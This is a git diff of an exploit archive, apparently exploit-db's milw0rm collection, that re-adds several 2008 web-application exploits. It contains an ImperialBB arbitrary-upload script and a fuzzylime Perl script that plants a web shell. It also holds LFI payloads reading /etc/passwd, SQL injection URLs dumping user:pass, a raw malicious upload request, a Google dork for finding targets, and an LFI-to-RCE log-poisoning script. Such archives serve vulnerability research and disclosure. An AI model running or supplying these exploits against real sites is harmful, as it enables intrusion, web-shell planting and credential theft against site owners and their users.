$this->allowredirection=TRUE; + } + + + /** + * This function is called if + * allowredirection() is enabled. + * You don't have to call it. 
+ *
+ * @access private
+ * @return string $this->get('http://'.$this->host.$this->path.$this->last_redirection)
+ * @return string $this->get($this->last_redirection)
+ * @return string $this->recv;
+ *
+ */
+ function getredirection()
+ {
+ if(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr))
+ {
+ $this->last_redirection = trim($codearr[2]);
+
+ if(!ereg('://',$this->last_redirection))
+ return $this->get('http://'.$this->host.$this->path.$this->last_redirection);
+
+ else
+ return $this->get($this->last_redirection);
+ }
+ else
+ return $this->recv;
+ }
+
+
+ /**
+ * This function allows you
+ * to reset some parameters.
+ *
+ * @access public
+ * @param string func Param
+ * @example $this->reset('header')
+ * @example $this->reset('cookie')
+ * @example $this->reset()
+ *
+ */
+ function reset($func='')
+ {
+ switch($func)
+ {
+ case 'header':
+ $this->header = array('');
+ break;
+
+ case 'cookie':
+ $this->cookie = array('');
+ break;
+
+ default:
+ $this->cookiejar = '';
+ $this->header = array('');
+ $this->cookie = array('');
+ $this->allowredirection = '';
+ break;
+ }
+ }
+}
+
+?>
+
+# milw0rm.com [2008-07-05]
diff --git a/platforms/php/webapps/6007.txt b/platforms/php/webapps/6007.txt
index 1422ed8ed..c787dfa26 100755
--- a/platforms/php/webapps/6007.txt
+++ b/platforms/php/webapps/6007.txt
@@ -1,15 +1,15 @@
-Cr@zy_King / sqL L0v3r'Z Crew Co. 2008 // From Turkey
-
-http://biyosecurity.com / If there isn't the devotion Success there... : )
-
-Greatz : aLL my Friend'z
-
-Kasseler-Cms (LFI/XSS) Multiple Remote Vulnerabilities
-
-Down : http://www.kasseler-cms.net
-
-LFI : http://127.0.0.1/index.php?module=phpManual&file=../../../../../../../../../../../etc/passwd
-
-Xss : http://127.0.0.1/http://www.kasseler-cms.net/index.php?module=Files&do=Category&cid=[XSS]
-
-# milw0rm.com [2008-07-05]
+Cr@zy_King / sqL L0v3r'Z Crew Co. 2008 // From Turkey
+
+http://biyosecurity.com / If there isn't the devotion Success there... : )
+
+Greatz : aLL my Friend'z
+
+Kasseler-Cms (LFI/XSS) Multiple Remote Vulnerabilities
+
+Down : http://www.kasseler-cms.net
+
+LFI : http://127.0.0.1/index.php?module=phpManual&file=../../../../../../../../../../../etc/passwd
+
+Xss : http://127.0.0.1/http://www.kasseler-cms.net/index.php?module=Files&do=Category&cid=[XSS]
+
+# milw0rm.com [2008-07-05]
diff --git a/platforms/php/webapps/6008.php b/platforms/php/webapps/6008.php
index 5cf8ffc08..c9225fc54 100755
--- a/platforms/php/webapps/6008.php
+++ b/platforms/php/webapps/6008.php
@@ -1,126 +1,126 @@ -Title : ImperialBB <= 2.3.5 Remote File Upload Vulnerability -Date : 5th July 2008 -Found by : PHPLizardo - http://phplizardo.2gb.fr -Greetz : Gu1ll4um3r0m41n - -Howto : 1. Go to your User Control Panel - 2. Upload any file you want - 3. Tamper the request and change the mime-type to : image/gif - 4. There is your file : http://site.com/[forum_path]/images/avatars/uploads/[your_nickname]_[filename].[ext] - -) :\r\n\n"; - $code = trim(fgets(STDIN)); - - $socket = @fsockopen($argv[1], 80, $eno, $estr, 30); - if(!$socket) - { - die("Could not connect to ".$argv[1].". Operation aborted."); - } - - $part1 = "POST " . $argv[2] . "profile.php?func=edit HTTP/1.1\r\n"; - $part1 .= "Host: " . $argv[1] . "\r\n"; - $part1 .= "Accept: */*\r\n"; - $part1 .= "Connection: Close\r\n"; - $part1 .= "Cookie: UserName=" . $argv[3] . "; Password=" . md5(md5($argv[4])) . "\r\n"; - $part1 .= "Content-Type: multipart/form-data; boundary=---------------------------200831142015814\r\n"; - - $part2 .= "-----------------------------200831142015814\r\n"; - $part2 .= "Content-Disposition: form-data; name=\"Email\"\r\n\r\n"; - $part2 .= "test@test.test\r\n"; - $part2 .= "-----------------------------200831142015814\r\n"; - $part2 .= "Content-Disposition: form-data; name=\"Email2\"\r\n\r\n"; - $part2 .= "test@test.test\r\n"; - $part2 .= "-----------------------------200831142015814\r\n"; - $part2 .= "Content-Disposition: form-data; name=\"OldPass\"\r\n\r\n\r\n"; - $part2 .= "-----------------------------200831142015814\r\n"; - $part2 .= "Content-Disposition: form-data; name=\"PassWord\"\r\n\r\n\r\n"; - $part2 .= "-----------------------------200831142015814\r\n"; - $part2 .= "Content-Disposition: form-data; name=\"Pass2\"\r\n\r\n\r\n"; - $part2 .= "-----------------------------200831142015814\r\n"; - $part2 .= "Content-Disposition: form-data; name=\"signature\"\r\n\r\n\r\n"; - $part2 .= "-----------------------------200831142015814\r\n"; - $part2 .= "Content-Disposition: 
form-data; name=\"aim\"\r\n\r\n\r\n"; - $part2 .= "-----------------------------200831142015814\r\n"; - $part2 .= "Content-Disposition: form-data; name=\"icq\"\r\n\r\n\r\n"; - $part2 .= "-----------------------------200831142015814\r\n"; - $part2 .= "Content-Disposition: form-data; name=\"msn\"\r\n\r\n\r\n"; - $part2 .= "-----------------------------200831142015814\r\n"; - $part2 .= "Content-Disposition: form-data; name=\"yahoo\"\r\n\r\n\r\n"; - $part2 .= "-----------------------------200831142015814\r\n"; - $part2 .= "Content-Disposition: form-data; name=\"Remote_Avatar_URL\"\r\n\r\n\r\n"; - $part2 .= "-----------------------------200831142015814\r\n"; - $part2 .= "Content-Disposition: form-data; name=\"Upload_Avatar\"; filename=\"funypicture.php\"\r\n"; - $part2 .= "Content-Type: image/gif\r\n\r\n"; - $part2 .= $code."\r\n"; - $part2 .= "-----------------------------200831142015814\r\n"; - $part2 .= "Content-Disposition: form-data; name=\"month\"\r\n\r\n"; - $part2 .= "00\r\n"; - $part2 .= "-----------------------------200831142015814\r\n"; - $part2 .= "Content-Disposition: form-data; name=\"day\"\r\n\r\n"; - $part2 .= "00\r\n"; - $part2 .= "-----------------------------200831142015814\r\n"; - $part2 .= "Content-Disposition: form-data; name=\"year\"\r\n\r\n"; - $part2 .= "0000\r\n"; - $part2 .= "-----------------------------200831142015814\r\n"; - $part2 .= "Content-Disposition: form-data; name=\"website\"\r\n\r\n\r\n"; - - $part2 .= "-----------------------------200831142015814\r\n"; - $part2 .= "Content-Disposition: form-data; name=\"location\"\r\n\r\n\r\n"; - $part2 .= "-----------------------------200831142015814\r\n"; - $part2 .= "Content-Disposition: form-data; name=\"email_on_pm\"\r\n\r\n"; - $part2 .= "0\r\n"; - $part2 .= "-----------------------------200831142015814\r\n"; - $part2 .= "Content-Disposition: form-data; name=\"OldPass\"\r\n\r\n\r\n"; - $part2 .= "-----------------------------200831142015814\r\n"; - $part2 .= "Content-Disposition: form-data; 
name=\"Submit\"\r\n\r\n"; - $part2 .= "Submit\r\n"; - $part2 .= "-----------------------------200831142015814--\r\n"; - - $part1 .= "Content-Length: " . strlen($part2) . "\r\n\r\n"; - - - - $part1 .= $part2; - - fwrite($socket, $part1); - - echo "It might have worked, check if your file is online at -> http://" . $argv[1] . $argv[2] . "/images/avatars/uploads/" . $argv[3] . "_funypicture.php"; - -} -else -{ - echo "\n\n"; - echo "+----.-----------------------------------------------------------+\r\n"; - echo "| ImperialBB <= 2.3.5 Remote Upload Vulnerability |\r\n"; - echo "| By PHPLizardo - irc.worldnet.net #carib0u |\r\n"; - echo "| Usage: php exploit.php site.com /path/ user pass |\r\n"; - echo "+---------------------------------------------------------------+\r\n"; - echo "\n\n"; -} -?> - -# milw0rm.com [2008-07-05] +Title : ImperialBB <= 2.3.5 Remote File Upload Vulnerability +Date : 5th July 2008 +Found by : PHPLizardo - http://phplizardo.2gb.fr +Greetz : Gu1ll4um3r0m41n + +Howto : 1. Go to your User Control Panel + 2. Upload any file you want + 3. Tamper the request and change the mime-type to : image/gif + 4. There is your file : http://site.com/[forum_path]/images/avatars/uploads/[your_nickname]_[filename].[ext] + +) :\r\n\n"; + $code = trim(fgets(STDIN)); + + $socket = @fsockopen($argv[1], 80, $eno, $estr, 30); + if(!$socket) + { + die("Could not connect to ".$argv[1].". Operation aborted."); + } + + $part1 = "POST " . $argv[2] . "profile.php?func=edit HTTP/1.1\r\n"; + $part1 .= "Host: " . $argv[1] . "\r\n"; + $part1 .= "Accept: */*\r\n"; + $part1 .= "Connection: Close\r\n"; + $part1 .= "Cookie: UserName=" . $argv[3] . "; Password=" . md5(md5($argv[4])) . 
"\r\n"; + $part1 .= "Content-Type: multipart/form-data; boundary=---------------------------200831142015814\r\n"; + + $part2 .= "-----------------------------200831142015814\r\n"; + $part2 .= "Content-Disposition: form-data; name=\"Email\"\r\n\r\n"; + $part2 .= "test@test.test\r\n"; + $part2 .= "-----------------------------200831142015814\r\n"; + $part2 .= "Content-Disposition: form-data; name=\"Email2\"\r\n\r\n"; + $part2 .= "test@test.test\r\n"; + $part2 .= "-----------------------------200831142015814\r\n"; + $part2 .= "Content-Disposition: form-data; name=\"OldPass\"\r\n\r\n\r\n"; + $part2 .= "-----------------------------200831142015814\r\n"; + $part2 .= "Content-Disposition: form-data; name=\"PassWord\"\r\n\r\n\r\n"; + $part2 .= "-----------------------------200831142015814\r\n"; + $part2 .= "Content-Disposition: form-data; name=\"Pass2\"\r\n\r\n\r\n"; + $part2 .= "-----------------------------200831142015814\r\n"; + $part2 .= "Content-Disposition: form-data; name=\"signature\"\r\n\r\n\r\n"; + $part2 .= "-----------------------------200831142015814\r\n"; + $part2 .= "Content-Disposition: form-data; name=\"aim\"\r\n\r\n\r\n"; + $part2 .= "-----------------------------200831142015814\r\n"; + $part2 .= "Content-Disposition: form-data; name=\"icq\"\r\n\r\n\r\n"; + $part2 .= "-----------------------------200831142015814\r\n"; + $part2 .= "Content-Disposition: form-data; name=\"msn\"\r\n\r\n\r\n"; + $part2 .= "-----------------------------200831142015814\r\n"; + $part2 .= "Content-Disposition: form-data; name=\"yahoo\"\r\n\r\n\r\n"; + $part2 .= "-----------------------------200831142015814\r\n"; + $part2 .= "Content-Disposition: form-data; name=\"Remote_Avatar_URL\"\r\n\r\n\r\n"; + $part2 .= "-----------------------------200831142015814\r\n"; + $part2 .= "Content-Disposition: form-data; name=\"Upload_Avatar\"; filename=\"funypicture.php\"\r\n"; + $part2 .= "Content-Type: image/gif\r\n\r\n"; + $part2 .= $code."\r\n"; + $part2 .= 
"-----------------------------200831142015814\r\n"; + $part2 .= "Content-Disposition: form-data; name=\"month\"\r\n\r\n"; + $part2 .= "00\r\n"; + $part2 .= "-----------------------------200831142015814\r\n"; + $part2 .= "Content-Disposition: form-data; name=\"day\"\r\n\r\n"; + $part2 .= "00\r\n"; + $part2 .= "-----------------------------200831142015814\r\n"; + $part2 .= "Content-Disposition: form-data; name=\"year\"\r\n\r\n"; + $part2 .= "0000\r\n"; + $part2 .= "-----------------------------200831142015814\r\n"; + $part2 .= "Content-Disposition: form-data; name=\"website\"\r\n\r\n\r\n"; + + $part2 .= "-----------------------------200831142015814\r\n"; + $part2 .= "Content-Disposition: form-data; name=\"location\"\r\n\r\n\r\n"; + $part2 .= "-----------------------------200831142015814\r\n"; + $part2 .= "Content-Disposition: form-data; name=\"email_on_pm\"\r\n\r\n"; + $part2 .= "0\r\n"; + $part2 .= "-----------------------------200831142015814\r\n"; + $part2 .= "Content-Disposition: form-data; name=\"OldPass\"\r\n\r\n\r\n"; + $part2 .= "-----------------------------200831142015814\r\n"; + $part2 .= "Content-Disposition: form-data; name=\"Submit\"\r\n\r\n"; + $part2 .= "Submit\r\n"; + $part2 .= "-----------------------------200831142015814--\r\n"; + + $part1 .= "Content-Length: " . strlen($part2) . "\r\n\r\n"; + + + + $part1 .= $part2; + + fwrite($socket, $part1); + + echo "It might have worked, check if your file is online at -> http://" . $argv[1] . $argv[2] . "/images/avatars/uploads/" . $argv[3] . "_funypicture.php"; + +} +else +{ + echo "\n\n"; + echo "+----.-----------------------------------------------------------+\r\n"; + echo "| ImperialBB <= 2.3.5 Remote Upload Vulnerability |\r\n"; + echo "| By PHPLizardo - irc.worldnet.net #carib0u |\r\n"; + echo "| Usage: php exploit.php site.com /path/ user pass |\r\n"; + echo "+---------------------------------------------------------------+\r\n"; + echo "\n\n"; +} +?> + +# milw0rm.com [2008-07-05] 
diff --git a/platforms/php/webapps/6009.pl b/platforms/php/webapps/6009.pl
index 6e65d3842..d7972559c 100755
--- a/platforms/php/webapps/6009.pl
+++ b/platforms/php/webapps/6009.pl
@@ -1,106 +1,106 @@ -#!/usr/bin/perl -# -# fuzzylime 3.0.1 Perl exploit -# -# discovered & written by Ams -# ax330d@gmail.com -# -# DESCRIPTION: -# There are availability to load files through script -# rss.php, and also there are unfiltered extract(); usage. -# This exploit creates shell in /code/counter/middle_index_inc.php -# -# USAGE: -# Run exploit: perl expl.pl http://www.site.com -# -# NEEDED: -# magic_quotes_gpc=off -# - -use strict; -use IO::Socket; - -print "\n\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - \n\t\t fuzzlyime 3.0.1 exploit - \n\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n"; - -if(@ARGV<1){ - die "\n\tUsage:\texpl.pl url\n\n - \n\tExample:\texpl.pl http://localhost/path/\n\n"; -} - -my $expl_url=$ARGV[0]; -my $shell=q~ - -~; -my $shell_name='middle_index.inc.php'; - -print "\tStarting exploit...\n"; -if($expl_url=~m#http://#){ - exploit($expl_url); -} else { - exploit('http://'.$expl_url); -} - -sub exploit { - # Defining... - my $site=pop @_; - (my $a,my $b,my $c,my @d)=split /\//,$site; - my $path=join('/',@d); - my $host=$c; - if($path) {$path='/'.$path;} - my $injection="p=../code/content.php%00&s=$shell_name%00&curcount=$shell"; - my $length=length($injection); - - # Injecting... - my $socket=IO::Socket::INET->new( - Proto=>"tcp", - PeerAddr=>$host, - PeerPort=>"80" - ); - if( ! $socket){ - die("\n\tUnable to connect to http://$host\n\n"); - } else { - - my $packet = "POST $path/rss.php HTTP/1.1\r\n"; - $packet .= "Host: $host\r\n"; - $packet .= "Connection: Close\r\n"; - $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; - $packet .= "Content-Length: $length\r\n\r\n"; - $packet .= "$injection"; - print $socket $packet; - close($socket); - } - sleep(1); - # Checking for shell... - $socket=IO::Socket::INET->new( - Proto=>"tcp", - PeerAddr=>$host, - PeerPort=>"80" - ); - if( ! 
$socket){ - die("\n\tUnable to connect to http://$host (check shell yourself)\n\n"); - } else { - my $packet = "POST $path/code/counter/$shell_name HTTP/1.1\r\n"; - $packet .= "Host: $host\r\n"; - $packet .= "Connection: Close\r\n\r\n"; - print $socket $packet; - - my $rcv; - my $dat=''; - while($rcv=<$socket>){ - $dat.=$rcv; - } - if ($dat =~ /200 OK/){ - print "\n\t$site\t[OK]\n\n"; - } else { - print "\n\t$site\t[FAIL]\n\n"; - } - close($socket); - } -} - -# milw0rm.com [2008-07-05] +#!/usr/bin/perl +# +# fuzzylime 3.0.1 Perl exploit +# +# discovered & written by Ams +# ax330d@gmail.com +# +# DESCRIPTION: +# There are availability to load files through script +# rss.php, and also there are unfiltered extract(); usage. +# This exploit creates shell in /code/counter/middle_index_inc.php +# +# USAGE: +# Run exploit: perl expl.pl http://www.site.com +# +# NEEDED: +# magic_quotes_gpc=off +# + +use strict; +use IO::Socket; + +print "\n\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + \n\t\t fuzzlyime 3.0.1 exploit + \n\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n"; + +if(@ARGV<1){ + die "\n\tUsage:\texpl.pl url\n\n + \n\tExample:\texpl.pl http://localhost/path/\n\n"; +} + +my $expl_url=$ARGV[0]; +my $shell=q~ + +~; +my $shell_name='middle_index.inc.php'; + +print "\tStarting exploit...\n"; +if($expl_url=~m#http://#){ + exploit($expl_url); +} else { + exploit('http://'.$expl_url); +} + +sub exploit { + # Defining... + my $site=pop @_; + (my $a,my $b,my $c,my @d)=split /\//,$site; + my $path=join('/',@d); + my $host=$c; + if($path) {$path='/'.$path;} + my $injection="p=../code/content.php%00&s=$shell_name%00&curcount=$shell"; + my $length=length($injection); + + # Injecting... + my $socket=IO::Socket::INET->new( + Proto=>"tcp", + PeerAddr=>$host, + PeerPort=>"80" + ); + if( ! 
$socket){ + die("\n\tUnable to connect to http://$host\n\n"); + } else { + + my $packet = "POST $path/rss.php HTTP/1.1\r\n"; + $packet .= "Host: $host\r\n"; + $packet .= "Connection: Close\r\n"; + $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; + $packet .= "Content-Length: $length\r\n\r\n"; + $packet .= "$injection"; + print $socket $packet; + close($socket); + } + sleep(1); + # Checking for shell... + $socket=IO::Socket::INET->new( + Proto=>"tcp", + PeerAddr=>$host, + PeerPort=>"80" + ); + if( ! $socket){ + die("\n\tUnable to connect to http://$host (check shell yourself)\n\n"); + } else { + my $packet = "POST $path/code/counter/$shell_name HTTP/1.1\r\n"; + $packet .= "Host: $host\r\n"; + $packet .= "Connection: Close\r\n\r\n"; + print $socket $packet; + + my $rcv; + my $dat=''; + while($rcv=<$socket>){ + $dat.=$rcv; + } + if ($dat =~ /200 OK/){ + print "\n\t$site\t[OK]\n\n"; + } else { + print "\n\t$site\t[FAIL]\n\n"; + } + close($socket); + } +} + +# milw0rm.com [2008-07-05] diff --git a/platforms/php/webapps/6010.txt b/platforms/php/webapps/6010.txt index 02ef56fe1..5434f14d6 100755 --- a/platforms/php/webapps/6010.txt +++ b/platforms/php/webapps/6010.txt 
@@ -1,25 +1,25 @@
-######################
-*^Hiva Digital Security Team^
- ^HIva Team^
-######################
-*Script:
-Xpoze Pro CMS 2008
-XPOZE Pro 3.06 SQL Injection Exploit
-######################
-*Demo:
-http://demo.xpoze.org/
-######################
-*Authors:
-farenh3it, sn0wman
-######################
-*Exploit:
-
-/user.html?uid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat(user,0x3a,pass),19,20,21,22,id,24,25,26,27,29,30,31,32,33+FROM+users+WHERE+id=1/*
-
-######################
-*for exam:
-http://demo.xpoze.org/user.html?uid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat(user,0x3a,pass),19,20,21,22,id,24,25,26,27,29,30,31,32,33+FROM+users+WHERE+id=1/*
-######################
-*Thanks to str0ke :X
-
-# milw0rm.com [2008-07-06]
+######################
+*^Hiva Digital Security Team^
+ ^HIva Team^
+######################
+*Script:
+Xpoze Pro CMS 2008
+XPOZE Pro 3.06 SQL Injection Exploit
+######################
+*Demo:
+http://demo.xpoze.org/
+######################
+*Authors:
+farenh3it, sn0wman
+######################
+*Exploit:
+
+/user.html?uid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat(user,0x3a,pass),19,20,21,22,id,24,25,26,27,29,30,31,32,33+FROM+users+WHERE+id=1/*
+
+######################
+*for exam:
+http://demo.xpoze.org/user.html?uid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat(user,0x3a,pass),19,20,21,22,id,24,25,26,27,29,30,31,32,33+FROM+users+WHERE+id=1/*
+######################
+*Thanks to str0ke :X
+
+# milw0rm.com [2008-07-06]
diff --git a/platforms/php/webapps/6011.txt b/platforms/php/webapps/6011.txt
index 7c6503485..696297d44 100755
--- a/platforms/php/webapps/6011.txt
+++ b/platforms/php/webapps/6011.txt
@@ -1,58 +1,58 @@ -=============================================================== - ContentNow CMS (Upload/XSS) Multiple Remote Vulnerabilities -=============================================================== - - ,--^----------,--------,-----,-------^--, - | ||||||||| `--------' | O .. CWH Underground Hacking Team .. - `+---------------------------^----------| - `\_,-------, _________________________| - / XXXXXX /`| / - / XXXXXX / `\ / - / XXXXXX /\______( - / XXXXXX / - / XXXXXX / - (________( - `------' - - -AUTHOR : CWH Underground -DATE : 6 July 2008 -SITE : cwh.citec.us - - -##################################################### - APPLICATION : Content CMS - VERSION : 1.4.1 - VENDOR : http://www.contentnow.mf4k.de - DOWNLOAD : http://downloads.sourceforge.net/contentnow/contentNow_141.zip -##################################################### - ---- Arbitrary File Upload --- - - This Vulnerability can upload malicious files direct to web server. - -[Login as user] - -[+] Upload Path: http://[Target]/[contentNow_path]/upload.php?path=/[contentNow_path]/upload/ - - [-] Example: http://192.168.24.25/contentNow/cn/upload.php?path=/contentNow/upload/ - -[+] Shell Script: http://[Target]/[contentNow_path]/upload/file/[Evil File] - - [-] Example: http://192.168.24.25/contentNow/upload/file/myshell.php - - ---- Remote XSS Exploit --- - -------------- - POC Exploit -------------- - -[+] http://192.168.24.25/contentnow/upload/file/language_menu.php/>"> -[+] http://192.168.24.25/contentnow/upload/file/language_menu.php?pageid=>">&clang=en - -################################################################## - Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos -################################################################## - -# milw0rm.com [2008-07-06] +=============================================================== + ContentNow CMS (Upload/XSS) Multiple Remote Vulnerabilities +=============================================================== + + 
,--^----------,--------,-----,-------^--, + | ||||||||| `--------' | O .. CWH Underground Hacking Team .. + `+---------------------------^----------| + `\_,-------, _________________________| + / XXXXXX /`| / + / XXXXXX / `\ / + / XXXXXX /\______( + / XXXXXX / + / XXXXXX / + (________( + `------' + + +AUTHOR : CWH Underground +DATE : 6 July 2008 +SITE : cwh.citec.us + + +##################################################### + APPLICATION : Content CMS + VERSION : 1.4.1 + VENDOR : http://www.contentnow.mf4k.de + DOWNLOAD : http://downloads.sourceforge.net/contentnow/contentNow_141.zip +##################################################### + +--- Arbitrary File Upload --- + + This Vulnerability can upload malicious files direct to web server. + +[Login as user] + +[+] Upload Path: http://[Target]/[contentNow_path]/upload.php?path=/[contentNow_path]/upload/ + + [-] Example: http://192.168.24.25/contentNow/cn/upload.php?path=/contentNow/upload/ + +[+] Shell Script: http://[Target]/[contentNow_path]/upload/file/[Evil File] + + [-] Example: http://192.168.24.25/contentNow/upload/file/myshell.php + + +--- Remote XSS Exploit --- + +------------- + POC Exploit +------------- + +[+] http://192.168.24.25/contentnow/upload/file/language_menu.php/>"> +[+] http://192.168.24.25/contentnow/upload/file/language_menu.php?pageid=>">&clang=en + +################################################################## + Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos +################################################################## + +# milw0rm.com [2008-07-06] diff --git a/platforms/php/webapps/6014.txt b/platforms/php/webapps/6014.txt index 70bd488ad..068b547fd 100755 --- a/platforms/php/webapps/6014.txt +++ b/platforms/php/webapps/6014.txt 
@@ -1,16 +1,16 @@
-+---------------------------------------+
-| Blind SQL Injection Vulnerability |
-| in Pay Per Click Script |
-| found by Hamtaro aka CorVu5 |
-|there must be 50 ways to learn to hover|
-+---------------------------------------+
-
-#gdork: "Pay Per Click Script powered by SmartPPC.com."
-
-#vuln: site.com/directory.php?username=&idDirectory=90992%20and%20ascii(substring((SELECT%20concat(username,0x3a,pass)%20from%20users%20limit%200,1),1,1))%3E108
-
-#login: site.com/accounts.php
----------------------------------------
-greetz Hamtaro aka CorVu5
-
-# milw0rm.com [2008-07-07]
++---------------------------------------+
+| Blind SQL Injection Vulnerability |
+| in Pay Per Click Script |
+| found by Hamtaro aka CorVu5 |
+|there must be 50 ways to learn to hover|
++---------------------------------------+
+
+#gdork: "Pay Per Click Script powered by SmartPPC.com."
+
+#vuln: site.com/directory.php?username=&idDirectory=90992%20and%20ascii(substring((SELECT%20concat(username,0x3a,pass)%20from%20users%20limit%200,1),1,1))%3E108
+
+#login: site.com/accounts.php
+---------------------------------------
+greetz Hamtaro aka CorVu5
+
+# milw0rm.com [2008-07-07]
diff --git a/platforms/php/webapps/6015.txt b/platforms/php/webapps/6015.txt
index 6c6293e74..274789e0f 100755
--- a/platforms/php/webapps/6015.txt
+++ b/platforms/php/webapps/6015.txt
@@ -1,72 +1,72 @@ -=========================================================================== - WebXell Editor (upload_pictures.php) Arbitrary File Upload Vulnerability -=========================================================================== - - ,--^----------,--------,-----,-------^--, - | ||||||||| `--------' | O .. CWH Underground Hacking Team .. - `+---------------------------^----------| - `\_,-------, _________________________| - / XXXXXX /`| / - / XXXXXX / `\ / - / XXXXXX /\______( - / XXXXXX / - / XXXXXX / - (________( - `------' - - -AUTHOR : CWH Underground -DATE : 7 July 2008 -SITE : cwh.citec.us - - -##################################################### - APPLICATION : WebXell Editor - VERSION : 0.1.3 - VENDOR : N/A - DOWNLOAD : http://downloads.sourceforge.net/webxelleditor/webXell-0.1.3.zip -##################################################### - ---- Arbitrary File Upload --- - - This Vulnerability can upload malicious files direct to web server. -Use Web proxy (Webscarab,etc..) to intercept data. 
- -[+] Upload Path: http://[Target]/[webxell_path]/upload_pictures.php - - [-] POC Exploit: - -POST http://192.168.24.25/webxell/upload_pictures.php HTTP/1.1 -Host: 192.168.24.25 -User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15 -Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 -Accept-Language: en-us,en;q=0.5 -Accept-Encoding: gzip,deflate -Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 -Keep-Alive: 300 -Proxy-Connection: keep-alive -Referer: http://192.168.24.25/webxell/index.php?file=test.xml -Cookie: storyread[1]=1; PHPSESSID=a663694e586aba414a1b9fb79917891f -Content-Type: multipart/form-data; boundary=---------------------------278151583918669 -Content-length: 241 - ------------------------------278151583918669 -Content-Disposition: form-data; name="updFile"; filename="phpbug.php" -Content-Type: img/jpeg - - ------------------------------278151583918669-- - - -[+] Shell Script: ***You can intercept file's name with Web proxy that tell the real name*** - - [-] Position: http://[target]/[webxell_path]/upload/[Evil_File] - - -################################################################## - Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos -################################################################## - -# milw0rm.com [2008-07-07] +=========================================================================== + WebXell Editor (upload_pictures.php) Arbitrary File Upload Vulnerability +=========================================================================== + + ,--^----------,--------,-----,-------^--, + | ||||||||| `--------' | O .. CWH Underground Hacking Team .. 
+ `+---------------------------^----------| + `\_,-------, _________________________| + / XXXXXX /`| / + / XXXXXX / `\ / + / XXXXXX /\______( + / XXXXXX / + / XXXXXX / + (________( + `------' + + +AUTHOR : CWH Underground +DATE : 7 July 2008 +SITE : cwh.citec.us + + +##################################################### + APPLICATION : WebXell Editor + VERSION : 0.1.3 + VENDOR : N/A + DOWNLOAD : http://downloads.sourceforge.net/webxelleditor/webXell-0.1.3.zip +##################################################### + +--- Arbitrary File Upload --- + + This Vulnerability can upload malicious files direct to web server. +Use Web proxy (Webscarab,etc..) to intercept data. + +[+] Upload Path: http://[Target]/[webxell_path]/upload_pictures.php + + [-] POC Exploit: + +POST http://192.168.24.25/webxell/upload_pictures.php HTTP/1.1 +Host: 192.168.24.25 +User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15 +Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 +Accept-Language: en-us,en;q=0.5 +Accept-Encoding: gzip,deflate +Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 +Keep-Alive: 300 +Proxy-Connection: keep-alive +Referer: http://192.168.24.25/webxell/index.php?file=test.xml +Cookie: storyread[1]=1; PHPSESSID=a663694e586aba414a1b9fb79917891f +Content-Type: multipart/form-data; boundary=---------------------------278151583918669 +Content-length: 241 + +-----------------------------278151583918669 +Content-Disposition: form-data; name="updFile"; filename="phpbug.php" +Content-Type: img/jpeg + + +-----------------------------278151583918669-- + + +[+] Shell Script: ***You can intercept file's name with Web proxy that tell the real name*** + + [-] Position: http://[target]/[webxell_path]/upload/[Evil_File] + + +################################################################## + Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos 
+##################################################################
+
+# milw0rm.com [2008-07-07]
diff --git a/platforms/php/webapps/6016.pl b/platforms/php/webapps/6016.pl
index 0e6c3a0d8..6b5cc2944 100755
--- a/platforms/php/webapps/6016.pl
+++ b/platforms/php/webapps/6016.pl
@@ -1,45 +1,45 @@
-#!/usr/bin/perl
-# ----------------------------------------------------------
-# Fuzzylime CMS 3.01 Multiple LFI / RCE
-# author : Cod3rZ
-# website : http://cod3rz.helloweb.eu
-# ----------------------------------------------------------
-# http://[site]/blog.php?file=../[file]\0
-# http://[site]/code/newsheads.php?heads=../[file]\0
-# post
-# http://[site]/code/commupdate.php (type=count&s=[file]\0)
-# ----------------------------------------------------------
-# LFI to RCE:
-# ----------------------------------------------------------
-
-use LWP::UserAgent;
-
- system("cls");
-#system("clear");
-
- print " -------------------------------------------------\n";
- print " Fuzzylime CMS 3.01 LFI / RCE \n";
- print " Powered by Cod3rZ \n";
- print " http://cod3rz.helloweb.eu \n";
- print " -------------------------------------------------\n";
- print " Insert Site (http://site.com/): \n ";
- chomp($site = );
- print " -------------------------------------------------\n";
- print " Insert Logs path \n ";
- chomp($path = );
- print " -------------------------------------------------\n";
-
- #Infect Logs
- $lwp = LWP::UserAgent->new;
- $siten = $site.'/blog.php?file=';
- $ua = $lwp->get($site.'coderz /coderz');
- #Control
- $ua = $lwp->get($site.$path.'%00');
- if($ua->content =~ m/cod3rz/) {
- print " Ok ".$site." is infected \n";
- print " -------------------------------------------------\n";
- print " ".$siten.$path."&cmd=[command]\\0 \n";
- print " -------------------------------------------------\n";
- }
-
-# milw0rm.com [2008-07-07]
+#!/usr/bin/perl
+# ----------------------------------------------------------
+# Fuzzylime CMS 3.01 Multiple LFI / RCE
+# author : Cod3rZ
+# website : http://cod3rz.helloweb.eu
+# ----------------------------------------------------------
+# http://[site]/blog.php?file=../[file]\0
